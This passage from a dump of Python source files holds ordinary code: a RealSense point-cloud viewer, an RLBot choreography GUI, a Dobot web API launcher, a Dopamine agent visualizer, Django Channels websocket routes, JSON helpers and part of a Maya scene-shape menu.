library\n\nfname_metadata = './example data/dual_d435_01/dual_d435_01.metadata.xml' # metadata file path\n\nwith contextlib.closing(tdt.DataReader(fname_metadata)) as d: # open data using 'with statement'\n\n i_frame = 10; # video frame number to process\n\n # show camera 1 RGB image and ROI\n roi_cam1 = [120, 70, 40, 80] # ROI; left, top, width, height\n [frame_rgb, frame_d] = d.get_rgbd_frame(i_frame, 0)\n cv2.rectangle(frame_rgb, tuple(roi_cam1[0:2]), (roi_cam1[0]+roi_cam1[2], roi_cam1[1]+roi_cam1[3]), (0, 0, 255), 2)\n cv2.imshow('rgb1', frame_rgb)\n\n # show camera 2 RGB image and ROI\n roi_cam2 = [170, 80, 50, 100] # ROI; left, top, width, height\n 
[frame_rgb, frame_d] = d.get_rgbd_frame(i_frame, 1)\n cv2.rectangle(frame_rgb, tuple(roi_cam2[0:2]), (roi_cam2[0]+roi_cam2[2], roi_cam2[1]+roi_cam2[3]), (0, 0, 255), 2)\n cv2.imshow('rgb2', frame_rgb)\n\n # get 3D point cloud in ROI\n pc_roi1 = d.get_pc_from_rgbd(i_frame, 0, roi_cam1)\n pc_roi2 = d.get_pc_from_rgbd(i_frame, 1, roi_cam2)\n\n # prepare for plotting\n app=pg.QtGui.QApplication([]) \n w = gl.GLViewWidget() \n \n # read and plot merged point cloud\n pc = d.get_mrgpc_frame(i_frame) \n tdt.plot_pc(pc, w, 4) \n\n # plot point cloud in ROIs\n tdt.plot_pc(pc_roi1, w, 5, (1,0,0,1))\n tdt.plot_pc(pc_roi2, w, 5, (1,0,0,1))\n\n # plot axis\n g=gl.GLAxisItem()\n w.addItem(g)\n\n # show the plot\n w.setCameraPosition(distance = 0.5)\n w.show()\n print('Close the window to quit.')\n pg.QtGui.QApplication.exec_() \n\n"} {"ext": "py", "sha": "1a30ae64bf37a9402670534d865c23f3b71042bd", "content": "\"\"\"RLBotChoreography\n\nUsage:\n ChoreographyHive [--bot-folder=<folder>]\n ChoreographyHive (-h | --help)\n\nOptions:\n -h --help Shows this help message.\n --bot-folder=<folder> Searches this folder for bot configs to use for names and appearances [default: .].\n\"\"\"\nimport copy\nimport os\nimport sys\nimport inspect\nimport time\n\nfrom docopt import docopt\nfrom importlib import reload, import_module\nfrom queue import Queue\nfrom threading import Thread\nfrom os.path import dirname, basename, isfile, join\nimport glob\n\nfrom rlbot.matchconfig.conversions import parse_match_config\nfrom rlbot.parsing.agent_config_parser import load_bot_appearance\nfrom rlbot.parsing.directory_scanner import scan_directory_for_bot_configs\nfrom rlbot.parsing.rlbot_config_parser import create_bot_config_layout\nfrom rlbot.setup_manager import SetupManager\nfrom rlbot.utils.structures.start_match_structures import MAX_PLAYERS\n\nimport hivemind\nfrom queue_commands import QCommand\nfrom choreography.choreography import Choreography\n\n# TODO:\n# - Do bot-folder from inside the GUI\n# - Prettify GUI\nclass RLBotChoreography:\n\n def __init__(self):\n # Runs GUI and Hivemind on two different threads.\n q = Queue()\n thread1 = Thread(target=self.run_gui, args=(q, ))\n thread1.start()\n thread2 = Thread(target=self.run_RLBotChoreography, args=(q, ))\n thread2.start()\n q.join()\n\n\n def setup_match(self):\n # TODO This should be replaced?\n arguments = docopt(__doc__)\n\n bot_directory = arguments['--bot-folder']\n bundles = scan_directory_for_bot_configs(bot_directory)\n\n # Set up RLBot.cfg\n framework_config = create_bot_config_layout()\n config_location = os.path.join(os.path.dirname(__file__), 'rlbot.cfg')\n framework_config.parse_file(config_location, max_index=MAX_PLAYERS)\n match_config = parse_match_config(framework_config, config_location, {}, {})\n\n looks_configs = {idx: bundle.get_looks_config() for idx, bundle in enumerate(bundles)}\n names = [bundle.name for bundle in bundles]\n\n player_config = match_config.player_configs[0]\n match_config.player_configs.clear()\n for i in range(max(len(bundles), self.min_bots)):\n copied = copy.copy(player_config)\n if i < len(bundles):\n copied.name = names[i]\n # If you want to override bot appearances to get a certain visual effect, e.g. 
with\n # specific boost colors, this is a good place to do it.\n copied.loadout_config = load_bot_appearance(looks_configs[i], 0)\n match_config.player_configs.append(copied)\n\n manager = SetupManager()\n manager.load_match_config(match_config, {})\n manager.connect_to_game()\n manager.start_match()\n\n\n def run_RLBotChoreography(self, queue):\n \"\"\"\n If Hivemind breaks out of game_loop it is reloaded and recreated.\n \"\"\"\n # Waits until a START command is received.\n while queue.get() != QCommand.START:\n continue\n\n self.setup_match()\n\n while True:\n my_hivemind = hivemind.Hivemind(queue, self.choreo_obj)\n my_hivemind.start() # Loop only quits on STOP command.\n\n # Reloads hivemind for new changes to take place.\n # reload(sys.modules[self.choreo_obj.__module__])\n reload(hivemind)\n\n # Checks what to do after Hivemind died.\n command = queue.get()\n if command == QCommand.ALL:\n self.setup_match()\n elif command == QCommand.EXIT:\n break\n\n exit() # Clean exit.\n\n\n def run_gui(self, queue):\n \"\"\"\n Runs the simple gui.\n \"\"\"\n\n def reload_choreographies():\n \"\"\"\n Finds and reloads all choreo modules and puts the found choreographies inside a dictionary.\n \"\"\"\n # Automatically finds all choreo modules.\n modules = glob.glob(join(dirname(__file__), \"choreography/choreos/*.py\"))\n choreo_modules = [basename(f)[:-3] for f in modules if isfile(f) and not f.endswith('__init__.py')]\n\n choreographies = {}\n for choreo in choreo_modules:\n module = f'choreography.choreos.{choreo}'\n\n # Try reloading the module.\n try:\n reload(sys.modules[module])\n classes = inspect.getmembers(sys.modules[module], inspect.isclass)\n\n # If not loaded yet, import it.\n except:\n print(f'Module not found, importing {module}')\n import_module(module)\n classes = inspect.getmembers(sys.modules[module], inspect.isclass)\n\n # Find all the choreography classes inside.\n finally:\n for name, obj in classes:\n # Checks whether the class subclasses Choreography.\n if issubclass(obj, Choreography) and obj is not Choreography:\n # FIXME Watch out for name conflicts!\n choreographies[name] = obj\n\n return choreographies\n\n def start():\n num_bots_changed()\n print(\"[RLBotChoreography]: Starting up!\")\n queue.put(QCommand.START)\n\n # Removes the button so we cannot start again.\n button_start.destroy()\n\n # Hive reset button.\n button_reload_hive = tk.Button(frame, text=\"↻ Hivemind\", command=reload_hive)\n button_reload_hive.pack()\n\n # All reset button.\n button_reload_all = tk.Button(frame, text=\"↻ All\", command=reload_all)\n button_reload_all.pack()\n\n def num_bots_changed():\n \"\"\"\n Looks at the choreography's requested number of bots and uses that. 
Otherwise will use the entered number.\n \"\"\"\n try:\n num_bots = self.choreo_obj.get_num_bots()\n except NotImplementedError:\n num_bots = int(entry_num_bots.get())\n finally:\n self.min_bots = min(int(num_bots), MAX_PLAYERS)\n entry_num_bots.delete(0, last=tk.END)\n entry_num_bots.insert(0, self.min_bots)\n\n def choreo_selected(var):\n \"\"\"\n Updates the selected choreography.\n \"\"\"\n self.choreographies = reload_choreographies()\n self.choreo_obj = self.choreographies[var]\n num_bots_changed()\n\n def reload_hive():\n num_bots_changed()\n print(\"[RLBotChoreography]: Stopping Hivemind.\")\n queue.put(QCommand.STOP)\n choreo_selected(menuvar.get())\n print(\"[RLBotChoreography]: Reloading Hivemind.\")\n queue.put(QCommand.HIVE)\n\n def reload_all():\n num_bots_changed()\n print(\"[RLBotChoreography]: Stopping Hivemind.\")\n queue.put(QCommand.STOP)\n choreo_selected(menuvar.get())\n print(\"[RLBotChoreography]: Reloading all.\")\n queue.put(QCommand.ALL)\n\n # TODO Make GUI look better.\n import tkinter as tk\n\n root = tk.Tk()\n frame = tk.Frame(root)\n frame.pack()\n\n # Start button.\n button_start = tk.Button(frame, text=\"Start\", command=start)\n button_start.pack()\n\n # Dropdown menu.\n self.choreographies = reload_choreographies()\n menuvar = tk.StringVar(root)\n menuvar.set('LightfallChoreography') # Set the default option\n dropMenu = tk.OptionMenu(frame, menuvar, *self.choreographies, command=choreo_selected)\n dropMenu.pack()\n\n # Label for the entry box.\n label_num_bots = tk.Label(frame, text=\"Number of bots\")\n label_num_bots.pack()\n\n # Number of bots entry box.\n entry_num_bots = tk.Entry(frame)\n entry_num_bots.insert(0, 10)\n entry_num_bots.pack()\n\n # This is here just to make sure everything is set up by default.\n choreo_selected(menuvar.get())\n\n root.mainloop()\n\n # Clean exit.\n print('[RLBotChoreography]: Shutting down.')\n queue.put(QCommand.STOP)\n queue.put(QCommand.EXIT)\n exit()\n\n\nif __name__ == '__main__':\n # Starts the show :)\n RLBotChoreography()\n"} {"ext": "py", "sha": "1a30aede77e1ffa311b709ffc5589dc113b7e00b", "content": "# Copyright 2017 BrainPad Inc. 
All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ==============================================================================\n\nfrom __future__ import absolute_import, division, print_function, unicode_literals\n\nimport argparse\n\nfrom web.app import create_app\nfrom dobot.utils import detect_dobot_port, dobot_is_on_port\n\nDEFAULT_BAUDRATE = 115200\n\nparser = argparse.ArgumentParser(description='Run Dobot WebAPI.')\nparser.add_argument('--port', type=int, default=18001)\nparser.add_argument('--host', type=str, default='0.0.0.0')\nparser.add_argument('--dobot-port', type=str, default=None)\nparser.add_argument('--tuner-file', type=str, default='/var/tmp/robot_tuner.dat')\nparser.add_argument('--instance_path', type=str, default=None)\n\nargs = parser.parse_args()\n\nif not args.dobot_port:\n dobot_port = detect_dobot_port(DEFAULT_BAUDRATE)\n if dobot_port is None:\n print('dobot offline')\n exit(1)\nelse:\n dobot_port = args.dobot_port\n if not dobot_is_on_port(dobot_port, DEFAULT_BAUDRATE):\n print('dobot is not detected on port {}'.format(dobot_port))\n exit(1)\n\napp = create_app(dobot_port, args.tuner_file, args.instance_path)\n\nif __name__ == '__main__':\n app.run(port=args.port, host=args.host)\n"} {"ext": "py", "sha": "1a30af099f6af14d0f31314f2c44af89af1e7b18", "content": "# coding=utf-8\n# Copyright 2018 The Dopamine Authors.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"Library used by example_viz.py to generate visualizations.\n\nThis file illustrates the following:\n - How to subclass an existing agent to add visualization functionality.\n - For DQN we visualize the cumulative rewards and the Q-values for each\n action (MyDQNAgent).\n - For Rainbow we visualize the cumulative rewards and the Q-value\n distributions for each action (MyRainbowAgent).\n - How to subclass Runner to run in eval mode, lay out the different subplots,\n generate the visualizations, and compile them into a video (MyRunner).\n - The function `run()` is the main entrypoint for running everything.\n\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport os\nimport sys\n\nfrom absl import logging\n\nfrom dopamine.agents.dqn import dqn_agent\nfrom dopamine.agents.rainbow import rainbow_agent\nfrom dopamine.discrete_domains import atari_lib\nfrom dopamine.discrete_domains import iteration_statistics\nfrom dopamine.discrete_domains import run_experiment\nfrom dopamine.utils import 
agent_visualizer\nfrom dopamine.utils import atari_plotter\nfrom dopamine.utils import bar_plotter\nfrom dopamine.utils import line_plotter\nimport gin\nimport numpy as np\nimport tensorflow as tf\nimport tf_slim\nimport pdb\nimport matplotlib.pyplot as plt\n\n\nclass MyDQNAgent(dqn_agent.DQNAgent):\n \"\"\"Sample DQN agent to visualize Q-values and rewards.\"\"\"\n\n def __init__(self, sess, num_actions, summary_writer=None):\n super(MyDQNAgent, self).__init__(sess, num_actions,\n summary_writer=summary_writer)\n self.q_values = [[] for _ in range(num_actions)]\n self.rewards = []\n\n def step(self, reward, observation, step_number):\n self.rewards.append(reward)\n return super(MyDQNAgent, self).step(reward, observation, step_number)\n\n def _select_action(self, step_number):\n action = super(MyDQNAgent, self)._select_action(step_number)\n # print(\"on selectionne ici\")\n q_vals = self._sess.run(self._net_outputs.q_values,\n {self.state_ph: self.state})[0]\n for i in range(len(q_vals)):\n self.q_values[i].append(q_vals[i])\n return action\n\n def reload_checkpoint(self, checkpoint_path, use_legacy_checkpoint=False):\n if use_legacy_checkpoint:\n variables_to_restore = atari_lib.maybe_transform_variable_names(\n tf.compat.v1.global_variables(), legacy_checkpoint_load=True)\n else:\n global_vars = set([x.name for x in tf.compat.v1.global_variables()])\n ckpt_vars = [\n '{}:0'.format(name)\n for name, _ in tf.train.list_variables(checkpoint_path)\n ]\n include_vars = list(global_vars.intersection(set(ckpt_vars)))\n variables_to_restore = tf_slim.get_variables_to_restore(\n include=include_vars)\n if variables_to_restore:\n reloader = tf.compat.v1.train.Saver(var_list=variables_to_restore)\n reloader.restore(self._sess, checkpoint_path)\n logging.info('Done restoring from %s', checkpoint_path)\n else:\n logging.info('Nothing to restore!')\n\n def get_q_values(self):\n return self.q_values\n\n def get_rewards(self):\n return [np.cumsum(self.rewards)]\n\n\nclass MyRainbowAgent(rainbow_agent.RainbowAgent):\n \"\"\"Sample Rainbow agent to visualize Q-values and rewards.\"\"\"\n\n def __init__(self, sess, num_actions, summary_writer=None):\n super(MyRainbowAgent, self).__init__(sess, num_actions,\n summary_writer=summary_writer)\n self.rewards = []\n\n def step(self, reward, observation, step_number):\n self.rewards.append(reward)\n return super(MyRainbowAgent, self).step(reward, observation, step_number)\n\n def reload_checkpoint(self, checkpoint_path, use_legacy_checkpoint=False):\n if use_legacy_checkpoint:\n variables_to_restore = atari_lib.maybe_transform_variable_names(\n tf.compat.v1.global_variables(), legacy_checkpoint_load=True)\n else:\n global_vars = set([x.name for x in tf.compat.v1.global_variables()])\n ckpt_vars = [\n '{}:0'.format(name)\n for name, _ in tf.train.list_variables(checkpoint_path)\n ]\n include_vars = list(global_vars.intersection(set(ckpt_vars)))\n variables_to_restore = tf_slim.get_variables_to_restore(\n include=include_vars)\n if variables_to_restore:\n reloader = tf.compat.v1.train.Saver(var_list=variables_to_restore)\n reloader.restore(self._sess, checkpoint_path)\n logging.info('Done restoring from %s', checkpoint_path)\n else:\n logging.info('Nothing to restore!')\n\n def get_probabilities(self):\n return self._sess.run(tf.squeeze(self._net_outputs.probabilities),\n {self.state_ph: self.state})\n\n def get_rewards(self):\n return [np.cumsum(self.rewards)]\n\n\nclass MyRunner(run_experiment.Runner):\n \"\"\"Sample Runner class to generate 
visualizations.\"\"\"\n\n def __init__(self, base_dir, trained_agent_ckpt_path, create_agent_fn,\n use_legacy_checkpoint=False):\n self._trained_agent_ckpt_path = trained_agent_ckpt_path\n self._use_legacy_checkpoint = use_legacy_checkpoint\n super(MyRunner, self).__init__(base_dir, create_agent_fn)\n\n def _initialize_checkpointer_and_maybe_resume(self, checkpoint_file_prefix):\n self._agent.reload_checkpoint(self._trained_agent_ckpt_path,\n self._use_legacy_checkpoint)\n self._start_iteration = 0\n\n def _run_one_iteration(self, iteration):\n statistics = iteration_statistics.IterationStatistics()\n logging.info('Starting iteration %d', iteration)\n _, _ = self._run_eval_phase(statistics)\n return statistics.data_lists\n\n def _run_one_iteration(self, iteration):\n statistics = iteration_statistics.IterationStatistics()\n logging.info('Starting iteration %d', iteration)\n\n num_episodes_eval, average_reward_eval = self._run_eval_phase(\n statistics)\n return statistics.data_lists\n\n def _run_eval_phase(self, statistics):\n # Perform the evaluation phase -- no learning.\n self._agent.eval_mode = True\n\n _, sum_returns, num_episodes = self._run_one_phase(\n self._evaluation_steps, statistics, 'eval')\n average_return = sum_returns / num_episodes if num_episodes > 0 else 0.0\n logging.info('Average undiscounted return per evaluation episode: %.2f',\n average_return)\n statistics.append({'eval_average_return': average_return})\n return num_episodes, average_return\n\n def _run_one_phase(self, min_steps, statistics, run_mode_str):\n step_count = 0\n num_episodes = 0\n sum_returns = 0.\n print(\"min_steps\", min_steps)\n while step_count < min_steps:\n print(\">>>>> step_count\", step_count)\n episode_length, episode_return = self._run_one_episode()\n statistics.append({\n '{}_episode_lengths'.format(run_mode_str): episode_length,\n '{}_episode_returns'.format(run_mode_str): episode_return\n })\n step_count += episode_length\n sum_returns += episode_return\n num_episodes += 1\n # We use sys.stdout.write instead of logging so as to flush frequently\n # without generating a line break.\n sys.stdout.write('Steps executed: {} '.format(step_count) +\n 'Episode length: {} '.format(episode_length) +\n 'Return: {}\\r'.format(episode_return))\n sys.stdout.flush()\n return step_count, sum_returns, num_episodes\n\n def _run_one_episode(self):\n step_number = 0\n total_reward = 0.\n\n action = self._initialize_episode()\n is_terminal = False\n\n # Keep interacting until we reach a terminal state.\n while True:\n observation, reward, is_terminal = self._run_one_step(action, step_number)\n\n total_reward += reward\n step_number += 1\n print(\"step_number\", step_number)\n\n if self._clip_rewards:\n # Perform reward clipping.\n reward = np.clip(reward, -1, 1)\n\n if (self._environment.game_over or\n step_number == self._max_steps_per_episode):\n # Stop the run loop once we reach the true end of episode.\n break\n elif is_terminal:\n # If we lose a life but the episode is not over, signal an artificial\n # end of episode to the agent.\n self._end_episode(reward, is_terminal)\n action = self._agent.begin_episode(observation)\n else:\n action = self._agent.step(reward, observation, step_number)\n\n self._end_episode(reward, is_terminal)\n\n return step_number, total_reward\n\n def _run_one_step(self, action, step_number):\n observation, reward, is_terminal, _ = self._environment.step(action)\n # Saving the render\n if True:\n if step_number > 900 and step_number < 1000:\n image = 
self._environment.render('rgb_array')\n plt.imshow(image)\n plt.savefig(\"/home/hugo/saliency_maps/Rainbow-Tennis/render/render\"+str(step_number)+\".png\")\n return observation, reward, is_terminal\n\ndef create_dqn_agent(sess, environment, summary_writer=None):\n return MyDQNAgent(sess, num_actions=environment.action_space.n,\n summary_writer=summary_writer)\n\n\ndef create_rainbow_agent(sess, environment, summary_writer=None):\n return MyRainbowAgent(sess, num_actions=environment.action_space.n,\n summary_writer=summary_writer)\n\n\ndef create_runner(base_dir, trained_agent_ckpt_path, agent='dqn',\n use_legacy_checkpoint=False):\n create_agent = create_dqn_agent if agent == 'dqn' else create_rainbow_agent\n return MyRunner(base_dir, trained_agent_ckpt_path, create_agent,\n use_legacy_checkpoint)\n\n\n\n\n\ndef run(agent, game, num_steps, root_dir, restore_ckpt,\n use_legacy_checkpoint=False):\n \"\"\"Main entrypoint for running and generating visualizations.\n\n Args:\n agent: str, agent type to use.\n game: str, Atari 2600 game to run.\n num_steps: int, number of steps to play game.\n root_dir: str, root directory where files will be stored.\n restore_ckpt: str, path to the checkpoint to reload.\n use_legacy_checkpoint: bool, whether to restore from a legacy (pre-Keras)\n checkpoint.\n \"\"\"\n tf.compat.v1.reset_default_graph()\n config = \"\"\"\n atari_lib.create_atari_environment.game_name = '{}'\n WrappedReplayBuffer.replay_capacity = 300\n \"\"\".format(game)\n base_dir = os.path.join(root_dir, 'agent_viz', game, agent)\n gin.parse_config(config)\n runner = create_runner(base_dir, restore_ckpt, agent, use_legacy_checkpoint)\n iteration = 0\n runner._run_one_iteration(iteration)\n"} {"ext": "py", "sha": "1a30b03607219069c5104c56e476a1b81f5fdd06", "content": "# See also: 📖 [Channels - Consumers](https://channels.readthedocs.io/en/latest/topics/consumers.html)\nfrom django.conf.urls import url\n\n# Websock練習1\nfrom webapp1.websocks.websock_practice1.v1.consumer import WebsockPractice1V1Consumer\n# ------- ----------------------------- -------- --------------------------\n# 1 2 3 4\n# 1. アプリケーション フォルダー名\n# 2. ディレクトリー名\n# 3. Python ファイル名。拡張子抜き\n# 4. クラス名\n\n# Websock練習2\nfrom webapp1.websocks.websock_practice2.v1.consumer import WebsockPractice2V1Consumer\n# ^ ^\n# ------- ----------------------------- -------- --------------------------\n# 1 2 3 4\n# 1. アプリケーション フォルダー名\n# 2. ディレクトリー名\n# 3. Python ファイル名。拡張子抜き\n# 4. クラス名\n\n# 〇×ゲームの練習1\nfrom webapp1.websocks.tic_tac_toe.v1.consumer import TicTacToeV1Consumer\n# ------- ----------------------- -------- -------------------\n# 1 2 3 4\n# 1. アプリケーション フォルダー名\n# 2. ディレクトリー名\n# 3. Python ファイル名。拡張子抜き\n# 4. クラス名\n\n# 〇×ゲームの練習2\nfrom webapp1.websocks.tic_tac_toe.v2.consumer_custom import TicTacToeV2ConsumerCustom\n# ^ two ^ two\n# ------- ----------------------- --------------- -------------------------\n# 1 2 3 4\n# 1. アプリケーション フォルダー名\n# 2. ディレクトリー名\n# 3. Python ファイル名。拡張子抜き\n# 4. クラス名\n\n# 〇×ゲームの練習3.1\nfrom webapp1.websocks.tic_tac_toe.v3o1.consumer_custom import TicTacToeV3o1ConsumerCustom\n# ^^^ three o one ^^^ three o one\n# ------- ------------------------- --------------- ---------------------------\n# 1 2 3 4\n# 1. アプリケーション フォルダー名\n# 2. ディレクトリー名\n# 3. Python ファイル名。拡張子抜き\n# 4. クラス名\n\n\nwebsocket_urlpatterns = [\n\n # +----\n # | Websock練習1\n\n # Websock練習1\n url(r'^websock-practice1/v1/$', WebsockPractice1V1Consumer.as_asgi()),\n # ----------------------- ------------------------------------\n # 1 2\n # 1. 
URLのパスの部分の、Django での正規表現の書き方\n # 2. クラス名とメソッド。 URL を ASGI形式にする\n\n # | Websock練習1\n # +----\n\n\n\n\n # +----\n # | Websock練習2\n\n # Websock練習2\n url(r'^websock-practice2/v1/$', WebsockPractice2V1Consumer.as_asgi()),\n # ^ ^\n # ----------------------- ------------------------------------\n # 1 2\n # 1. URLのパスの部分の、Django での正規表現の書き方\n # 2. クラス名とメソッド。 URL を ASGI形式にする\n\n # | Websock練習2\n # +----\n\n\n\n\n # 〇×ゲームの練習1\n url(r'^tic-tac-toe/v1/playing/(?P<room_name>\\w+)/$',\n # --------------------------------------------\n # 1\n TicTacToeV1Consumer.as_asgi()),\n # -----------------------------\n # 2\n # 1. 例えば `http://example.com/tic-tac-toe/v1/playing/Elephant/` のようなURLのパスの部分の、Django での正規表現の書き方。\n # room_name は変数として渡される\n # 2. クラス名とメソッド。 URL を ASGI形式にする\n\n # 〇×ゲームの練習2\n url(r'^tic-tac-toe/v2/playing/(?P<kw_room_name>\\w+)/$',\n # ^\n # -----------------------------------------------\n # 1\n TicTacToeV2ConsumerCustom.as_asgi()),\n # ^\n # -----------------------------------\n # 2\n # 1. 例えば `http://example.com/tic-tac-toe/v2/playing/Elephant/` のようなURLのパスの部分の、Django での正規表現の書き方。\n # kw_room_name は変数として渡される\n # 2. クラス名とメソッド。 URL を ASGI形式にする\n\n # 〇×ゲームの練習3.1\n url(r'^tic-tac-toe/v3o1/playing/(?P<kw_room_name>\\w+)/$',\n # ^^^ three o one\n # -------------------------------------------------\n # 1\n TicTacToeV3o1ConsumerCustom.as_asgi()),\n # ^^^ three o one\n # -------------------------------------\n # 2\n # 1. 例えば `http://example.com/tic-tac-toe/v3o1/playing/Elephant/` のようなURLのパスの部分の、Django での正規表現の書き方。\n # -----------------------------------\n # kw_room_name は変数として渡される\n # 2. クラス名とメソッド。 URL を ASGI形式にする\n]\n"} {"ext": "py", "sha": "1a30b1d46538e642e226c9fbad175df5d2fc18a0", "content": "from base64 import b64encode\nimport datetime\nfrom enum import Enum\nfrom typing import Any, Union\nimport json\n\n\nclass _JsonEncoder(json.JSONEncoder):\n def default(self, o: Any) -> Union[str, float]:\n if isinstance(o, datetime.datetime):\n return o.astimezone(tz=datetime.timezone.utc).isoformat()\n if isinstance(o, datetime.timedelta):\n return o.total_seconds()\n if isinstance(o, bytes):\n return b64encode(o).decode('ascii')\n if isinstance(o, Enum):\n return o.name\n return super().default(o)\n\n\ndef json_dumps(o: Union[dict, list]) -> str:\n if isinstance(o, dict):\n o = {k: v for k, v in o.items() if not k.startswith('_')}\n return json.dumps(o, cls=_JsonEncoder, separators=(',', ':'))\n\n\ndef pagination_header(count: int, page: int, per_page: int) -> dict:\n return {\n 'X-Page': page,\n 'X-Per-Page': per_page,\n 'X-Total': count,\n 'X-Total-Pages': (count + (per_page - 1)) // per_page,\n }\n"} {"ext": "py", "sha": "1a30b3bf178c429b61826658b52140124b407180", "content": "##########################################################################\n#\n# Copyright (c) 2013, Image Engine Design Inc. 
All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are\n# met:\n#\n# * Redistributions of source code must retain the above copyright\n# notice, this list of conditions and the following disclaimer.\n#\n# * Redistributions in binary form must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer in the\n# documentation and/or other materials provided with the distribution.\n#\n# * Neither the name of Image Engine Design nor the names of any\n# other contributors to this software may be used to endorse or\n# promote products derived from this software without specific prior\n# written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS\n# IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR\n# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,\n# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,\n# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR\n# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF\n# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING\n# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS\n# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n##########################################################################\n\nimport maya.cmds\n\nimport IECore\nimport IECoreMaya\n\n__dagMenuCallbacks = []\n## Registers a callback to be used when creating the right click dag\n# menu for scene shapes. 
Callbacks should have the following signature :\n#\n# callback( menu, sceneShape ).\ndef addDagMenuCallback( callback ) :\n\n\tif not callback in __dagMenuCallbacks :\n\t\t__dagMenuCallbacks.append( callback )\n\n## Removes a callback previously added with addDagMenuCallback.\t\t\ndef removeDagMenuCallback( callback ) :\n\n\t__dagMenuCallbacks.remove( callback )\n\n## This is forwarded to by the ieSceneShapeDagMenuProc function in\n# ieSceneShape.mel\ndef _dagMenu( menu, sceneShape ) :\n\n\tsceneShapes = __selectedSceneShapes()\n\tif not sceneShapes:\n\t\treturn\n\t\n\tfnScS = []\n\tfor target in sceneShapes:\n\t\tfnScS.append( IECoreMaya.FnSceneShape( target ) )\n\t\n\tmaya.cmds.setParent( menu, menu=True )\n\n\tinvalidSceneShapes = __invalidSceneShapes( sceneShapes )\n\t\n\tif invalidSceneShapes:\n\t\tmaya.cmds.menuItem(\n\t\tlabel = \"Invalid Inputs for selected SceneShapes!\",\n\t\tradialPosition = \"N\",\n\t\t)\n\t\t\n\t# Component mode\n\telif fnScS[0].selectedComponentNames():\n\t\t\n\t\t\tmaya.cmds.menuItem(\n\t\t\tlabel = \"Object\",\n\t\t\tradialPosition = \"N\",\n\t\t\tcommand = IECore.curry( __objectCallback, sceneShapes[0] ),\n\t\t\t)\n\t\t\t\n\t\t\tmaya.cmds.menuItem(\n\t\t\t\tlabel = \"Print Component Names\",\n\t\t\t\tradialPosition = \"NW\",\n\t\t\t\tcommand = IECore.curry( __printComponents, sceneShapes[0] )\n\t\t\t)\n\n\t\t\tmaya.cmds.menuItem(\n\t\t\t\tlabel = \"Print Selected Component Names\",\n\t\t\t\tradialPosition = \"NE\",\n\t\t\t\tcommand = IECore.curry( __printSelectedComponents, sceneShapes[0] )\n\t\t\t)\n\t\t\n\t\t\tmaya.cmds.menuItem(\n\t\t\t\tlabel = \"Expand...\",\n\t\t\t\tradialPosition = \"SE\",\n\t\t\t\tsubMenu = True\n\t\t\t)\n\n\t\t\tmaya.cmds.menuItem(\n\t\t\t\tlabel = \"Expand to Selected Components\",\n\t\t\t\tradialPosition = \"S\",\n\t\t\t\tcommand = IECore.curry( __expandToSelected, sceneShapes[0] )\n\t\t\t)\n\t\t\tmaya.cmds.setParent( \"..\", menu=True )\n\n\t\t\tmaya.cmds.menuItem(\n\t\t\t\tlabel = \"Create Locator\",\n\t\t\t\tradialPosition = \"SW\",\n\t\t\t\tsubMenu = True,\n\t\t\t)\n\t\t\t\n\t\t\tmaya.cmds.menuItem(\n\t\t\t\tlabel = \"At Bound Min\",\n\t\t\t\tradialPosition = \"N\",\n\t\t\t\tcommand = IECore.curry( __createLocatorAtPoints, sceneShapes[0], [ \"Min\" ] ),\n\t\t\t)\n\t\t\t\n\t\t\tmaya.cmds.menuItem(\n\t\t\t\tlabel = \"At Bound Max\",\n\t\t\t\tradialPosition = \"NE\",\n\t\t\t\tcommand = IECore.curry( __createLocatorAtPoints, sceneShapes[0], [ \"Max\" ] ),\n\t\t\t)\n\t\t\t\n\t\t\tmaya.cmds.menuItem(\n\t\t\t\tlabel = \"At Bound Min And Max\",\n\t\t\t\tradialPosition = \"E\",\n\t\t\t\tcommand = IECore.curry( __createLocatorAtPoints, sceneShapes[0], [ \"Min\", \"Max\" ] ),\n\t\t\t)\n\t\t\t\n\t\t\tmaya.cmds.menuItem(\n\t\t\t\tlabel = \"At Bound Centre\",\n\t\t\t\tradialPosition = \"SE\",\n\t\t\t\tcommand = IECore.curry( __createLocatorAtPoints, sceneShapes[0], [ \"Center\" ] ),\n\t\t\t)\n\t\t\t\n\t\t\tmaya.cmds.menuItem(\n\t\t\t\tlabel = \"At Transform Origin\",\n\t\t\t\tradialPosition = \"S\",\n\t\t\t\tcommand = IECore.curry( __createLocatorWithTransform, sceneShapes[0] ),\n\t\t\t)\n\t\t\tmaya.cmds.setParent( \"..\", menu=True 